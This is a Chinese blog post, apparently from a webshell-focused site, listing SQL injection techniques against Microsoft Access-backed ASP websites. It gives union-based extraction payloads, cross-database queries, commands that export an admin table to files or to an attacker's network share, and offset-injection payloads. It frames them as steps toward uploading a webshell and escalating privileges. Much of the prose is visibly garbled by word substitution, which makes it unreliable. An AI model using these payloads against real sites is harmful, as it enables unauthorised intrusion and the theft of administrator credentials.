Access注入点高级运用总结

分类:安全 | 2011-09-13 | 撸过 132 次
0人扯谈

信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是:
猜表猜段猜内容—MD5—去靠山—看上传,备份,设置信息等等—上WEBSEHLL—提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好..

但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些地方 是可以改善和进一步发挥 的.PS,我信赖行动 确定不止这些,只是创造的人都本身用着不公然 偷着乐罢了..

 
————————————————————–
union查询法
起首要说的就是查询办法,一样平常的查询办法就是
and 1=(select count(*) from admin where left(id,1)=’1′)
如许起头确定 了…就算你应用种种千般的器材,也是一个个字的去猜去确定 对不对,不对再换一个.如许的毛病显而易见,慢. 出格是在揣摩颠末 32位MD5加密过的段的时间 …根本 上你可以去泡壶茶再喝一杯.
以是这个时间 ,union select横空出现.别认为只能在PHP里用哦…
譬如你有一个ACCESS点:
https://www.webshell.cc/xiaoyang.asp?coder=1
知道存在admin表(你固然 可以拿个器材先快速猜出表和字段来),
然后我们直接来:
https://www.webshell.cc/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6….. from admin [where coderx=1(假如有限定查询条件)]
这里从1起头加到回显正常为止.然后变更 URL里相应在页面出现的1~X为password,username之类的对象,就可以直接暴内容了.多利便 ,多快捷.茶可以先放放,凉一些再来喝了.

 

—————————————————————
Access跨库查询
偶然间某个网站做事器上有两个以上体系 ,你创造此中一个有ACCESS注入点,但是靠山没法提权,其它一个体系 没有注入点,但是靠山却有你必要 的功能.那么这个时间 ,跨库来了.固然 ,你还可以用来MDB溢出,渗出的过程等等.他的作用每每是意想不到的.
跨库的查询语句:
子查询:
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
union查询:
union select 1,2,3,4…. from admin in “D:\xioatianyang\okok.asa” where id=1
跨库的作用固然 不但这些了,大伙连续 发挥 吧..这里供给 一篇参考过的文章毗连 :
http://www.2cto.com/Article/200507/5869.html

—————————————————————
Access注入,导出txt,htm,html
子查询语句:
SELECT * into [test.txt] in ‘d:\web\’ ‘text;’ from admin
如许就把admin表的内容以test范例存进了d:\web内里 .
UNION查询:
union select * into [admin.txt] in ‘c:\’ ‘test;’ from admin
并且这里也可以生涯到内地来:
SELECT * into [test.txt] in ‘\\yourip\share’ ‘text;’ from admin
不外 ,很多 人包孕我本身测试,本机数据库来操纵是没题目的,但是一旦在注入点上,子查询会回显没有权限,union会回显举措 查询不能作为行的滥觞.可以说照样个困难 …缘故起因 大概是UNION只适用查询结合,UNION后头不能跟举措 .和这个内容干系 的,本论坛已有一帖:
https://www.webshell.cc/viewthread.php?tid=3016&extra=page%3D7
由于网上有很多和这干系 的原料 ,以是我照样把他引进来了.假如一旦这行动 运用 乐成 的话,理论上我们只要知道表名,不必要 知道段名,就可以看到该表全部内容了.可能我们可以建.php.tianyang asp.asp之类的文件可能目次来导进文件~照样会很壮大的.
—————————————————————
Access偏移注入
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)

本站内容均为原创,转载请务必保留署名与链接!
Access注入点高级运用总结:https://www.webshell.cc/1257.html
标签: ,

相关日志